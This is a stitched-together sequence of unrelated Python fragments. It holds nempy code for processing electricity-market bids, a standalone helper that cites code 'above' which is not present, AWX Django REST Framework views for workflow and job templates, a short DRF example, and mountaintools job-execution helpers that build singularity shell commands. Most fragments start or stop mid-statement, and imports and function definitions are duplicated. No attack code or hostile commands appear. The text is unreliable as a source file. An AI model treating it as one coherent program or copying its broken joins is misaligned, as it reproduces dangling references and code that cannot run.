_scaling_for_agc_ramp_rates(BIDPEROFFER_D, initial_conditions) BIDPEROFFER_D = _scaling_for_uigf(BIDPEROFFER_D, uigf_values) self.BIDPEROFFER_D, BIDDAYOFFER_D = _enforce_preconditions_for_enabling_fcas( BIDPEROFFER_D, BIDDAYOFFER_D, initial_conditions, unit_availability) volume_bids = _format_volume_bids(self.BIDPEROFFER_D, self.service_name_mapping) price_bids = _format_price_bids(BIDDAYOFFER_D, self.service_name_mapping) volume_bids = volume_bids[volume_bids['unit'].isin(list(unit_info['unit']))] volume_bids = volume_bids.loc[:, ['unit', 'service', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10']] price_bids = price_bids[price_bids['unit'].isin(list(unit_info['unit']))] price_bids = price_bids.loc[:, ['unit', 'service', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10']] # Price bids coming from xml have already been scaled by loss factors, so we need to undo this. price_bids = self._unscale_price_bids(price_bids, unit_info) return volume_bids, price_bids @staticmethod def _unscale_price_bids(price_bids, unit_info): price_bids = pd.merge(price_bids, unit_info.loc[:, ['unit', 'loss_factor']], on='unit') for col in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10']: price_bids[col] = np.where(price_bids['service'] == 'energy', price_bids[col] * price_bids['loss_factor'], price_bids[col]) return price_bids.drop(columns=['loss_factor']) def add_fcas_trapezium_constraints(self): """Load the fcas trapezium constraints into the UnitData class so subsequent method calls can access them. Examples -------- >>> inputs_loader = _test_setup() >>> unit_data = UnitData(inputs_loader) If we try and call add_fcas_trapezium_constraints before calling get_processed_bids we get an error. >>> unit_data.add_fcas_trapezium_constraints() Traceback (most recent call last): ... nempy.historical_inputs.units.MethodCallOrderError: Call get_processed_bids before add_fcas_trapezium_constraints. After calling get_processed_bids it goes away. >>> volume_bids, price_bids = unit_data.get_processed_bids() >>> unit_data.add_fcas_trapezium_constraints() If we try and access the trapezium constraints before calling this method we get an error. >>> inputs_loader = _test_setup() >>> unit_data = UnitData(inputs_loader) >>> unit_data.get_fcas_max_availability() Traceback (most recent call last): ... nempy.historical_inputs.units.MethodCallOrderError: Call add_fcas_trapezium_constraints before
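# A hypothetical, pure-python sketch (not nempy code) of the mode stepping performed by
# _fast_start_calc_end_interval_state above, for a single unit: add the dispatch interval
# to the time already spent in the current mode and roll over into later modes whenever a
# mode's length is exhausted. The numbers below are made up.
def end_of_interval_state(current_mode, time_in_current_mode, mode_lengths, dispatch_interval):
    # mode_lengths maps mode number -> length in minutes; modes past the last entry are open ended.
    mode = current_mode
    time_in_mode = time_in_current_mode + dispatch_interval
    while mode in mode_lengths and time_in_mode > mode_lengths[mode]:
        time_in_mode -= mode_lengths[mode]
        mode += 1
    return mode, time_in_mode

if __name__ == '__main__':
    # Unit is 3 minutes into mode 1 (length 4 min); a 5 minute interval carries it 4 minutes
    # into mode 2 (length 10 min), so it ends the interval in mode 2 with 4 minutes elapsed.
    assert end_of_interval_state(1, 3.0, {1: 4.0, 2: 10.0, 3: 20.0, 4: 10.0}, 5.0) == (2, 4.0)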
if created: return None if parent.id == sub.id: return {"Error": _("Cycle detected.")} ''' Look for parent->child connection in all relationships except the relationship that is attempting to be added; because it's ok to re-add the relationship ''' relationships = ['success_nodes', 'failure_nodes', 'always_nodes'] relationships.remove(self.relationship) qs = functools.reduce(lambda x, y: (x | y), (Q(**{'{}__in'.format(r): [sub.id]}) for r in relationships)) if models.WorkflowJobTemplateNode.objects.filter(Q(pk=parent.id) & qs).exists(): return {"Error": _("Relationship not allowed.")} parent_node_type_relationship = getattr(parent, self.relationship) parent_node_type_relationship.add(sub) graph = WorkflowDAG(parent.workflow_job_template) if graph.has_cycle(): parent_node_type_relationship.remove(sub) return {"Error": _("Cycle detected.")} parent_node_type_relationship.remove(sub) return None class WorkflowJobTemplateNodeCreateApproval(RetrieveAPIView): model = models.WorkflowJobTemplateNode serializer_class = serializers.WorkflowJobTemplateNodeCreateApprovalSerializer permission_classes = [] def post(self, request, *args, **kwargs): obj = self.get_object() serializer = self.get_serializer(instance=obj, data=request.data) if not serializer.is_valid(): return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) approval_template = obj.create_approval_template(**serializer.validated_data) data = serializers.WorkflowApprovalTemplateSerializer(approval_template, context=self.get_serializer_context()).data return Response(data, status=status.HTTP_201_CREATED) def check_permissions(self, request): if not request.user.is_authenticated: raise PermissionDenied() obj = self.get_object().workflow_job_template if request.method == 'POST': if not request.user.can_access(models.WorkflowJobTemplate, 'change', obj, request.data): self.permission_denied(request) else: if not request.user.can_access(models.WorkflowJobTemplate, 'read', obj): self.permission_denied(request) class WorkflowJobTemplateNodeSuccessNodesList(WorkflowJobTemplateNodeChildrenBaseList): relationship = 'success_nodes' class WorkflowJobTemplateNodeFailureNodesList(WorkflowJobTemplateNodeChildrenBaseList): relationship = 'failure_nodes' class WorkflowJobTemplateNodeAlwaysNodesList(WorkflowJobTemplateNodeChildrenBaseList): relationship = 'always_nodes' class WorkflowJobNodeChildrenBaseList(SubListAPIView): model = models.WorkflowJobNode serializer_class = serializers.WorkflowJobNodeListSerializer parent_model = models.WorkflowJobNode relationship = '' search_fields = ('unified_job_template__name', 'unified_job_template__description') # # Limit the set of WorkflowJobeNodes to the related nodes of specified by #'relationship' # def get_queryset(self): parent = self.get_parent_object() self.check_parent_access(parent) return getattr(parent, self.relationship).all() class WorkflowJobNodeSuccessNodesList(WorkflowJobNodeChildrenBaseList): relationship = 'success_nodes' class WorkflowJobNodeFailureNodesList(WorkflowJobNodeChildrenBaseList): relationship = 'failure_nodes' class WorkflowJobNodeAlwaysNodesList(WorkflowJobNodeChildrenBaseList): relationship = 'always_nodes' class WorkflowJobTemplateList(ListCreateAPIView): model = models.WorkflowJobTemplate serializer_class = serializers.WorkflowJobTemplateSerializer always_allow_superuser = False class WorkflowJobTemplateDetail(RelatedJobsPreventDeleteMixin, RetrieveUpdateDestroyAPIView): model = models.WorkflowJobTemplate serializer_class = serializers.WorkflowJobTemplateSerializer 
always_allow_superuser = False class WorkflowJobTemplateCopy(CopyAPIView): model = models.WorkflowJobTemplate copy_return_serializer_class = serializers.WorkflowJobTemplateSerializer def get(self, request, *args, **kwargs): obj = self.get_object() if not request.user.can_access(obj.__class__, 'read', obj): raise PermissionDenied() can_copy, messages = request.user.can_access_with_errors(self.model, 'copy', obj) data = OrderedDict( [ ('can_copy', can_copy), ('can_copy_without_user_input', can_copy), ('templates_unable_to_copy', [] if can_copy else ['all']), ('credentials_unable_to_copy', [] if can_copy else ['all']), ('inventories_unable_to_copy', [] if can_copy else ['all']), ] ) if messages and can_copy: data['can_copy_without_user_input'] = False data.update(messages) return Response(data) def _build_create_dict(self, obj): """Special processing of fields managed by char_prompts""" r = super(WorkflowJobTemplateCopy, self)._build_create_dict(obj) field_names = set(f.name for f in obj._meta.get_fields()) for field_name, ask_field_name in obj.get_ask_mapping().items(): if field_name in r and field_name not in field_names: r.setdefault('char_prompts', {}) r['char_prompts'][field_name] = r.pop(field_name) return r @staticmethod def deep_copy_permission_check_func(user, new_objs): for obj in new_objs: for field_name in obj._get_workflow_job_field_names(): item = getattr(obj, field_name, None) if item is None: continue elif field_name in ['inventory']: if not user.can_access(item.__class__, 'use', item): setattr(obj, field_name, None) elif field_name in ['unified_job_template']: if not user.can_access(item.__class__, 'start', item, validate_license=False): setattr(obj, field_name, None) elif field_name in ['credentials']: for cred in item.all(): if not user.can_access(cred.__class__, 'use', cred): logger.debug('Deep copy: removing {} from relationship due to permissions'.format(cred)) item.remove(cred.pk) obj.save() class WorkflowJobTemplateLabelList(JobTemplateLabelList): parent_model = models.WorkflowJobTemplate class WorkflowJobTemplateLaunch(RetrieveAPIView): model = models.WorkflowJobTemplate obj_permission_type = 'start' serializer_class = serializers.WorkflowJobLaunchSerializer always_allow_superuser = False def update_raw_data(self, data): try: obj = self.get_object() except PermissionDenied: return data extra_vars = data.pop('extra_vars', None) or {} if obj: for v in obj.variables_needed_to_start: extra_vars.setdefault(v, u'') if extra_vars: data['extra_vars'] = extra_vars modified_ask_mapping = models.WorkflowJobTemplate.get_ask_mapping() modified_ask_mapping.pop('extra_vars') for field_name, ask_field_name in obj.get_ask_mapping().items(): if not getattr(obj, ask_field_name): data.pop(field_name, None) elif field_name == 'inventory': data[field_name] = getattrd(obj, "%s.%s" % (field_name, 'id'), None) else: data[field_name] = getattr(obj, field_name) return data def post(self, request, *args, **kwargs): obj = self.get_object() if 'inventory_id' in request.data: request.data['inventory'] = request.data['inventory_id'] serializer = self.serializer_class(instance=obj, data=request.data) if not serializer.is_valid(): return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) if not request.user.can_access(models.JobLaunchConfig, 'add', serializer.validated_data, template=obj): raise PermissionDenied() new_job = obj.create_unified_job(**serializer.validated_data) new_job.signal_start() data = OrderedDict() data['workflow_job'] = new_job.id data['ignored_fields'] = 
serializer._ignored_fields data.update(serializers.WorkflowJobSerializer(new_job, context=self.get_serializer_context()).to_representation(new_job)) headers = {'Location': new_job.get_absolute_url(request)} return Response(data, status=status.HTTP_201_CREATED, headers=headers) class WorkflowJobRelaunch(GenericAPIView): model = models.WorkflowJob obj_permission_type = 'start' serializer_class = serializers.EmptySerializer def check_object_permissions(self, request, obj): if request.method == 'POST' and obj: relaunch_perm, messages = request.user.can_access_with_errors(self.model, 'start', obj) if not relaunch_perm and 'workflow_job_template' in messages: self.permission_denied(request, message=messages['workflow_job_template']) return super(WorkflowJobRelaunch, self).check_object_permissions(request, obj) def get(self, request, *args, **kwargs): return Response({}) def post(self, request, *args, **kwargs): obj = self.get_object() if obj.is_sliced_job: jt = obj.job_template if not jt: raise ParseError(_('Cannot relaunch slice workflow job orphaned from job template.')) elif not obj.inventory or min(obj.inventory.hosts.count(), jt.job_slice_count) != obj.workflow_nodes.count(): raise ParseError(_('Cannot relaunch sliced workflow job after slice count has changed.')) new_workflow_job = obj.create_relaunch_workflow_job() new_workflow_job.signal_start() data = serializers.WorkflowJobSerializer(new_workflow_job, context=self.get_serializer_context()).data headers = {'Location': new_workflow_job.get_absolute_url(request=request)} return Response(data, status=status.HTTP_201_CREATED, headers=headers) class WorkflowJobTemplateWorkflowNodesList(SubListCreateAPIView): model = models.WorkflowJobTemplateNode serializer_class = serializers.WorkflowJobTemplateNodeSerializer parent_model = models.WorkflowJobTemplate relationship = 'workflow_job_template_nodes' parent_key = 'workflow_job_template' search_fields = ('unified_job_template__name', 'unified_job_template__description') def get_queryset(self): return super(WorkflowJobTemplateWorkflowNodesList, self).get_queryset().order_by('id') class WorkflowJobTemplateJobsList(SubListAPIView): model = models.WorkflowJob serializer_class = serializers.WorkflowJobListSerializer parent_model = models.WorkflowJobTemplate relationship = 'workflow_jobs' parent_key = 'workflow_job_template' class WorkflowJobTemplateSchedulesList(SubListCreateAPIView): name = _("Workflow Job Template Schedules") model = models.Schedule serializer_class = serializers.ScheduleSerializer parent_model = models.WorkflowJobTemplate relationship = 'schedules' parent_key = 'unified_job_template' class WorkflowJobTemplateNotificationTemplatesAnyList(SubListCreateAttachDetachAPIView): model = models.NotificationTemplate serializer_class = serializers.NotificationTemplateSerializer parent_model = models.WorkflowJobTemplate class WorkflowJobTemplateNotificationTemplatesStartedList(WorkflowJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_started' class WorkflowJobTemplateNotificationTemplatesErrorList(WorkflowJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_error' class WorkflowJobTemplateNotificationTemplatesSuccessList(WorkflowJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_success' class WorkflowJobTemplateNotificationTemplatesApprovalList(WorkflowJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_approvals' class WorkflowJobTemplateAccessList(ResourceAccessList): model = 
models.User # needs to be User for AccessLists's parent_model = models.WorkflowJobTemplate class WorkflowJobTemplateObjectRolesList(SubListAPIView): model = models.Role serializer_class = serializers.RoleSerializer parent_model = models.WorkflowJobTemplate search_fields = ('role_field', 'content_type__model') def get_queryset(self): po = self.get_parent_object() content_type = ContentType.objects.get_for_model(self.parent_model) return models.Role.objects.filter(content_type=content_type, object_id=po.pk) class WorkflowJobTemplateActivityStreamList(SubListAPIView): model = models.ActivityStream serializer_class = serializers.ActivityStreamSerializer parent_model = models.WorkflowJobTemplate relationship = 'activitystream_set' search_fields = ('changes',) def get_queryset(self): parent = self.get_parent_object() self.check_parent_access(parent) qs = self.request.user.get_queryset(self.model) return qs.filter(Q(workflow_job_template=parent) | Q(workflow_job_template_node__workflow_job_template=parent)).distinct() class WorkflowJobList(ListAPIView): model = models.WorkflowJob serializer_class = serializers.WorkflowJobListSerializer class WorkflowJobDetail(UnifiedJobDeletionMixin, RetrieveDestroyAPIView): model = models.WorkflowJob serializer_class = serializers.WorkflowJobSerializer class WorkflowJobWorkflowNodesList(SubListAPIView): model = models.WorkflowJobNode serializer_class = serializers.WorkflowJobNodeListSerializer always_allow_superuser = True parent_model = models.WorkflowJob relationship = 'workflow_job_nodes' parent_key = 'workflow_job' search_fields = ('unified_job_template__name', 'unified_job_template__description') def get_queryset(self): return super(WorkflowJobWorkflowNodesList, self).get_queryset().order_by('id') class WorkflowJobCancel(RetrieveAPIView): model = models.WorkflowJob obj_permission_type = 'cancel' serializer_class = serializers.WorkflowJobCancelSerializer def post(self, request, *args, **kwargs): obj = self.get_object() if obj.can_cancel: obj.cancel() schedule_task_manager() return Response(status=status.HTTP_202_ACCEPTED) else: return self.http_method_not_allowed(request, *args, **kwargs) class WorkflowJobNotificationsList(SubListAPIView): model = models.Notification serializer_class = serializers.NotificationSerializer parent_model = models.WorkflowJob relationship = 'notifications' search_fields = ('subject', 'notification_type', 'body') def get_sublist_queryset(self, parent): return self.model.objects.filter( Q(unifiedjob_notifications=parent) | Q(unifiedjob_notifications__unified_job_node__workflow_job=parent, unifiedjob_notifications__workflowapproval__isnull=False) ).distinct() class WorkflowJobActivityStreamList(SubListAPIView): model = models.ActivityStream serializer_class = serializers.ActivityStreamSerializer parent_model = models.WorkflowJob relationship = 'activitystream_set' search_fields = ('changes',) class SystemJobTemplateList(ListAPIView): model = models.SystemJobTemplate serializer_class = serializers.SystemJobTemplateSerializer def get(self, request, *args, **kwargs): if not request.user.is_superuser and not request.user.is_system_auditor: raise PermissionDenied(_("Superuser privileges needed.")) return super(SystemJobTemplateList, self).get(request, *args, **kwargs) class SystemJobTemplateDetail(RetrieveAPIView): model = models.SystemJobTemplate serializer_class = serializers.SystemJobTemplateSerializer class SystemJobTemplateLaunch(GenericAPIView): model = models.SystemJobTemplate obj_permission_type = 'start' serializer_class = 
serializers.EmptySerializer def get(self, request, *args, **kwargs): return Response({}) def post(self, request, *args, **kwargs): obj = self.get_object() new_job = obj.create_unified_job(extra_vars=request.data.get('extra_vars', {})) new_job.signal_start() data = OrderedDict() data['system_job'] = new_job.id data.update(serializers.SystemJobSerializer(new_job, context=self.get_serializer_context()).to_representation(new_job)) headers = {'Location': new_job.get_absolute_url(request)} return Response(data, status=status.HTTP_201_CREATED, headers=headers) class SystemJobTemplateSchedulesList(SubListCreateAPIView): name = _("System Job Template Schedules") model = models.Schedule serializer_class = serializers.ScheduleSerializer parent_model = models.SystemJobTemplate relationship = 'schedules' parent_key = 'unified_job_template' class SystemJobTemplateJobsList(SubListAPIView): model = models.SystemJob serializer_class = serializers.SystemJobListSerializer parent_model = models.SystemJobTemplate relationship = 'jobs' parent_key = 'system_job_template' class SystemJobTemplateNotificationTemplatesAnyList(SubListCreateAttachDetachAPIView): model = models.NotificationTemplate serializer_class = serializers.NotificationTemplateSerializer parent_model = models.SystemJobTemplate class SystemJobTemplateNotificationTemplatesStartedList(SystemJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_started' class SystemJobTemplateNotificationTemplatesErrorList(SystemJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_error' class SystemJobTemplateNotificationTemplatesSuccessList(SystemJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_success' class JobList(ListAPIView): model = models.Job serializer_class = serializers.JobListSerializer class JobDetail(UnifiedJobDeletionMixin, RetrieveDestroyAPIView): model = models.Job serializer_class = serializers.JobDetailSerializer def update(self, request, *args, **kwargs): obj = self.get_object() # Only allow changes (PUT/PATCH) when job status is "new". 
if obj.status != 'new': return self.http_method_not_allowed(request, *args, **kwargs) return super(JobDetail, self).update(request, *args, **kwargs) class JobCredentialsList(SubListAPIView): model = models.Credential serializer_class = serializers.CredentialSerializer parent_model = models.Job relationship = 'credentials' class JobLabelList(SubListAPIView): model = models.Label serializer_class = serializers.LabelSerializer parent_model = models.Job relationship = 'labels' parent_key = 'job' class WorkflowJobLabelList(JobLabelList): parent_model = models.WorkflowJob class JobActivityStreamList(SubListAPIView): model = models.ActivityStream serializer_class = serializers.ActivityStreamSerializer parent_model = models.Job relationship = 'activitystream_set' search_fields = ('changes',) class JobCancel(RetrieveAPIView): model = models.Job obj_permission_type = 'cancel' serializer_class = serializers.JobCancelSerializer def post(self, request, *args, **kwargs): obj = self.get_object() if obj.can_cancel: obj.cancel() return Response(status=status.HTTP_202_ACCEPTED) else: return self.http_method_not_allowed(request, *args, **kwargs) class JobRelaunch(RetrieveAPIView): model = models.Job obj_permission_type = 'start' serializer_class = serializers.JobRelaunchSerializer def update_raw_data(self, data): data = super(JobRelaunch, self).update_raw_data(data) try: obj = self.get_object() except PermissionDenied: return data if obj: needed_passwords = obj.passwords_needed_to_start if needed_passwords: data['credential_passwords'] = {} for p in needed_passwords: data['credential_passwords'][p] = u'' else: data.pop('credential_passwords', None) return data @transaction.non_atomic_requests def dispatch(self, *args, **kwargs): return super(JobRelaunch, self).dispatch(*args, **kwargs) def check_object_permissions(self, request, obj): if request.method == 'POST' and obj: relaunch_perm, messages = request.user.can_access_with_errors(self.model, 'start', obj) if not relaunch_perm and 'detail' in messages: self.permission_denied(request, message=messages['detail']) return super(JobRelaunch,
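The launch, relaunch and cancel views above share one pattern: a DRF view whose POST either performs the state transition (returning 201 or 202) or falls back to 405 when the object is not in a valid state. A minimal sketch of that pattern in plain Django REST Framework — the DemoJobCancel class and its model attributes are illustrative, not the actual AWX classes, and it is not wired to a model or URLconf:

from rest_framework import status
from rest_framework.generics import RetrieveAPIView
from rest_framework.response import Response

class DemoJobCancel(RetrieveAPIView):
    # queryset and serializer_class would point at a real model in a real project
    def post(self, request, *args, **kwargs):
        obj = self.get_object()
        if obj.can_cancel:                      # the model decides whether cancelling is valid
            obj.cancel()                        # perform the state transition
            return Response(status=status.HTTP_202_ACCEPTED)
        # wrong state: answer 405 instead of returning an error payload
        return self.http_method_not_allowed(request, *args, **kwargs)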
import types import types import hashlib import json import os import shutil import tempfile import subprocess from cairio import client as ca import inspect from subprocess import Popen, PIPE import shlex import time import sys import multiprocessing import random import fnmatch def sha1(str): hash_object = hashlib.sha1(str.encode('utf-8')) return hash_object.hexdigest() def compute_job_input_signature(val, input_name, *, directory): if type(val) == str: if val.startswith('sha1://'): if directory: raise Exception('sha1:// path not allowed for directory input') list = str.split(val, '/') return list[2] elif val.startswith('kbucket://'): if directory: hash0 = ca.computeDirHash(val) if not hash0: raise Exception( 'Unable to compute directory hash for input: {}'.format(input_name)) return hash0 else: sha1 = ca.computeFileSha1(val) if not sha1: raise Exception( 'Unable to compute file sha-1 for input: {}'.format(input_name)) return sha1 else: if os.path.exists(val): if directory: if os.path.isdir(val): hash0 = ca.computeDirHash(val) if not hash0: raise Exception( 'Unable to compute hash for directory input: {} ({})'.format(input_name, val)) return hash0 else: raise Exception( 'Input is not a directory: {}'.format(input_name)) else: if os.path.isfile(val): sha1 = ca.computeFileSha1(val) if not sha1: raise Exception( 'Unable to compute sha-1 of input: {} ({})'.format(input_name, val)) return sha1 else: raise Exception( 'Input is not a file: {}'.format(input_name)) else: raise Exception('Input file does not exist: '+val) else: if hasattr(val, 'signature'): return getattr(val, 'signature') else: raise Exception( "Unable to compute signature for input: {}".format(input_name)) def get_file_extension(fname): if type(fname) == str: name, ext = os.path.splitext(fname) return ext else: return '' def compute_processor_job_stats_signature(self): return compute_processor_job_output_signature(self, '--stats--') def compute_processor_job_console_out_signature(self): return compute_processor_job_output_signature(self, '--console-out--') def compute_processor_job_output_signature(self, output_name): processor_inputs = [] job_inputs = [] for input0 in self.INPUTS: name0 = input0.name val0 = getattr(self, name0) processor_inputs.append(dict( name=name0 )) job_inputs.append(dict( name=name0, signature=compute_job_input_signature( val0, input_name=name0, directory=input0.directory), ext=get_file_extension(val0) )) processor_outputs = [] job_outputs = [] for output0 in self.OUTPUTS: name0 = output0.name processor_outputs.append(dict( name=name0 )) val0 = getattr(self, name0) if type(val0) == str: job_outputs.append(dict( name=name0, ext=get_file_extension(val0) )) else: job_outputs.append(dict( name=name0, ext=val0['ext'] )) processor_parameters = [] job_parameters = [] for param0 in self.PARAMETERS: name0 = param0.name processor_parameters.append(dict( name=name0 )) job_parameters.append(dict( name=name0, value=getattr(self, name0) )) processor_obj = dict( processor_name=self.NAME, processor_version=self.VERSION, inputs=processor_inputs, outputs=processor_outputs, parameters=processor_parameters ) signature_obj = dict( processor=processor_obj, inputs=job_inputs, outputs=job_outputs, parameters=job_parameters ) if output_name: signature_obj["output_name"] = output_name signature_string = json.dumps(signature_obj, sort_keys=True) return sha1(signature_string) def create_temporary_file(fname): tempdir = os.environ.get('KBUCKET_CACHE_DIR', tempfile.gettempdir()) tmp = tempdir+'/mlprocessors' if not 
os.path.exists(tmp): os.mkdir(tmp) return tmp+'/'+fname class ProcessorExecuteOutput(): def __init__(self): self.outputs = dict() self.stats = dict() self.console_out = '' def _read_python_code_of_directory(dirname, additional_files=[], exclude_init=True): patterns = ['*.py']+additional_files files = [] dirs = [] for fname in os.listdir(dirname): if os.path.isfile(dirname+'/'+fname): matches = False for pattern in patterns: if fnmatch.fnmatch(fname, pattern): matches = True if exclude_init and (fname == '__init__.py'): matches = False if matches: with open(dirname+'/'+fname) as f: txt = f.read() files.append(dict( name=fname, content=txt )) elif os.path.isdir(dirname+'/'+fname): if (not fname.startswith('__')) and (not fname.startswith('.')): content = _read_python_code_of_directory( dirname+'/'+fname, additional_files=additional_files, exclude_init=False) if len(content['files'])+len(content['dirs']) > 0: dirs.append(dict( name=fname, content=content )) return dict( files=files, dirs=dirs ) def _write_python_code_to_directory(dirname, code): if os.path.exists(dirname): raise Exception( 'Cannot write code to already existing directory: {}'.format(dirname)) os.mkdir(dirname) for item in code['files']: fname0 = dirname+'/'+item['name'] with open(fname0, 'w') as f: f.write(item['content']) for item in code['dirs']: _write_python_code_to_directory( dirname+'/'+item['name'], item['content']) def _read_text_file(fname): with open(fname) as f: return f.read() def _write_text_file(fname, str): with open(fname, 'w') as f: f.write(str) def _read_text_file(fname): with open(fname) as f: return f.read() def _write_text_file(fname, str): with open(fname, 'w') as f: f.write(str) def _get_expanded_args(args): expanded_args_list = [] for key in args: val = args[key] if type(val) == str: val = "'{}'".format(val) elif type(val) == dict: val = "{}".format(json.dumps(val)) expanded_args_list.append('{}={}'.format(key, val)) expanded_args = ', '.join(expanded_args_list) return expanded_args def _execute_helper(proc, X, *, container, tempdir, _system_call_prefix, **kwargs): # Note: if container is '', then we are just executing on the host machine singularity_opts = [] if container: kbucket_cache_dir = ca.localCacheDir() singularity_opts.append( '-B {}:{}'.format(kbucket_cache_dir, '/sha1-cache')) singularity_opts.append('-B /tmp:/tmp') for input0 in proc.INPUTS: name0 = input0.name fname0 = getattr(X, name0) if fname0: if fname0.startswith('kbucket://') or fname0.startswith('sha1://'): pass else: fname0 = os.path.abspath(fname0) if container: fname2 = '/execute_in_container/input_{}'.format(name0) singularity_opts.append('-B {}:{}'.format(fname0, fname2)) else: fname2 = fname0 kwargs[name0] = fname2 for output0 in proc.OUTPUTS: name0 = output0.name val = getattr(X, name0) if val: val = os.path.abspath(val) dirname = os.path.dirname(val) filename = os.path.basename(val) dirname2 = '/execute_in_container/outputdir_{}'.format(name0) if container: kwargs[name0] = dirname2+'/'+filename singularity_opts.append('-B {}:{}'.format(dirname, dirname2)) else: kwargs[name0] = val expanded_kwargs = _get_expanded_args(kwargs) processor_source_fname = inspect.getsourcefile(proc) processor_source_dirname = os.path.dirname(processor_source_fname) # Note: in future, we do not want to mount mountaintools! 
This was a temp hack because I did not have wi-fi access mountaintools_source_dirname = os.path.abspath( os.path.dirname(os.path.realpath(__file__))+'/..') if not processor_source_fname: raise Exception( 'inspect.getsourcefile() returned empty for processor.') if container: singularity_opts.append( '-B {}:/execute_in_container/processor_source'.format(processor_source_dirname)) # Note: in future, we do not want to mount mountaintools! This was a temp hack because I did not have wi-fi access singularity_opts.append( '-B {}:/execute_in_container/mountaintools'.format(mountaintools_source_dirname)) else: os.symlink(processor_source_dirname, tempdir+'/processor_source') # Note: in future, we do not want to mount mountaintools! This was a temp hack because I did not have wi-fi access os.symlink(mountaintools_source_dirname, tempdir+'/mountaintools') # Code generation code = """ from processor_source import {processor_class_name} def main(): {processor_class_name}.execute({expanded_kwargs}) if __name__ == "__main__": main() """ code = code.replace('{processor_class_name}', proc.__name__) code = code.replace('{expanded_kwargs}', expanded_kwargs) _write_text_file(tempdir+'/execute_in_container.py', code) if container: singularity_opts.append( '-B {}:/execute_in_container/execute_in_container.py'.format(tempdir+'/execute_in_container.py')) env_vars = [] if hasattr(proc, 'ENVIRONMENT_VARIABLES'): list = proc.ENVIRONMENT_VARIABLES for v in list: val = os.environ.get(v, '') if val: env_vars.append('{}={}'.format(v, val)) if container: singularity_opts.append('--contain') singularity_opts.append('-e') # Note: in future, we do not want to mount mountaintools! This was a temp hack because I did not have wi-fi access singularity_cmd = 'singularity exec {} {} bash -c "PYTHONPATH=/execute_in_container/mountaintools KBUCKET_CACHE_DIR=/sha1-cache {} python3 /execute_in_container/execute_in_container.py"'.format( ' '.join(singularity_opts), container, ' '.join(env_vars)) else: singularity_cmd = 'python3 {}/execute_in_container.py'.format(tempdir) if _system_call_prefix is not None: singularity_cmd = '{} {}'.format( _system_call_prefix, singularity_cmd) # singularity_cmd='bash -c "{}"'.format(singularity_cmd) retcode, console_out = _run_command_and_print_output(singularity_cmd) if retcode != 0: raise Exception('Processor returned a non-zero exit code') return console_out def _shell_execute(cmd): popen = subprocess.Popen('{}'.format(cmd), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, shell=True) console_output_lines = [] for stdout_line in iter(popen.stdout.readline, ""): # yield stdout_line console_output_lines.append(stdout_line) print(stdout_line, end='\r') popen.stdout.close() return_code = popen.wait() return return_code, ''.join(console_output_lines) def _run_command_and_print_output(cmd): print('RUNNING: '+cmd) return _shell_execute(cmd) def _run_command_and_print_output_old(command): print('RUNNING: '+command) with Popen(shlex.split(command), stdout=PIPE, stderr=PIPE) as process: while True: output_stdout = process.stdout.readline() output_stderr = process.stderr.readline() if (not output_stdout) and (not output_stderr) and (process.poll() is not None): break if output_stdout: print(output_stdout.decode()) if output_stderr: print(output_stderr.decode()) rc = process.poll() return rc def createJob(proc, _container=None, _cache=True, _force_run=None, _keep_temp_files=None, **kwargs): if _force_run is None: if os.environ.get('MLPROCESSORS_FORCE_RUN', '') == 'TRUE': _force_run = 
True else: _force_run = False if _keep_temp_files is None: if os.environ.get('MLPROCESSORS_KEEP_TEMP_FILES', '') == 'TRUE': _keep_temp_files = True else: _keep_temp_files = False if _container == 'default': if hasattr(proc, 'CONTAINER'): _container = proc.CONTAINER inputs = dict() for input0 in proc.INPUTS: name0 = input0.name if name0 not in kwargs: raise Exception('Missing input: {}'.format(name0)) fname0 = kwargs[name0] if fname0.startswith('kbucket://') or fname0.startswith('sha1://'): pass else: fname0 = os.path.abspath(fname0) if not os.path.exists(fname0): raise Exception( 'Input {} does not exist: {}'.format(name0, fname0)) if os.path.isfile(fname0): sha1_url = ca.saveFile(fname0) if not sha1_url: raise Exception( 'Problem saving input {} to kbucket ({})'.format(name0, fname0)) fname0 = sha1_url else: pass # TODO: think about how to handle directories -- probably just give a warning message inputs[name0] = fname0 outputs = dict() for output0 in proc.OUTPUTS: name0 = output0.name if name0 not in kwargs: raise Exception('Missing output: {}'.format(name0)) val0 = kwargs[name0] if type(val0) != dict: raise Exception('Type of output {} cannot be {}'.format( name0, str(type(val0)))) outputs[name0] = val0 parameters = dict() for param0 in proc.PARAMETERS: name0 = param0.name if name0 not in kwargs: if param0.optional: val0 = param0.default else: raise Exception('Missing required parameter: {}'.format(name0)) else: val0 = kwargs[name0] parameters[name0] = val0 if _container: if _container.startswith('kbucket://') or _container.startswith('sha1://'): pass else: newpath = ca.saveFile(_container) if not newpath: raise Exception('Unable to save (or upload) container file.') if not _container.startswith('sha1://'): _container = newpath processor_source_fname = inspect.getsourcefile(proc) processor_source_dirname = os.path.dirname(processor_source_fname) processor_source_basename = os.path.basename(processor_source_fname) processor_source_basename_noext = os.path.splitext( processor_source_basename)[0] code = _read_python_code_of_directory( processor_source_dirname, additional_files=getattr(proc, 'ADDITIONAL_FILES', []), exclude_init=True) code['files'].append(dict( name='__init__.py', content='from .{} import {}'.format( processor_source_basename_noext, proc.__name__) )) processor_job = dict( command='execute_mlprocessor', label='{} (version: {}) (container: {})'.format( proc.NAME, proc.VERSION, _container), processor_name=proc.NAME, processor_version=proc.VERSION, processor_class_name=proc.__name__, processor_code=ca.saveObject(code, basename='code.json'), container=_container, inputs=inputs, outputs=outputs, parameters=parameters ) if _force_run: processor_job['_force_run'] = True if _cache: processor_job['_cache'] = True if _keep_temp_files: processor_job['_keep_temp_files'] = True return processor_job _realized_containers = set() def _prepare_processor_job(job): container = job.get('container', None) if container: if container not in _realized_containers: print('realizing container: '+container) a = ca.realizeFile(path=container) if a: _realized_containers.add(container) else: raise Exception('Unable to realize
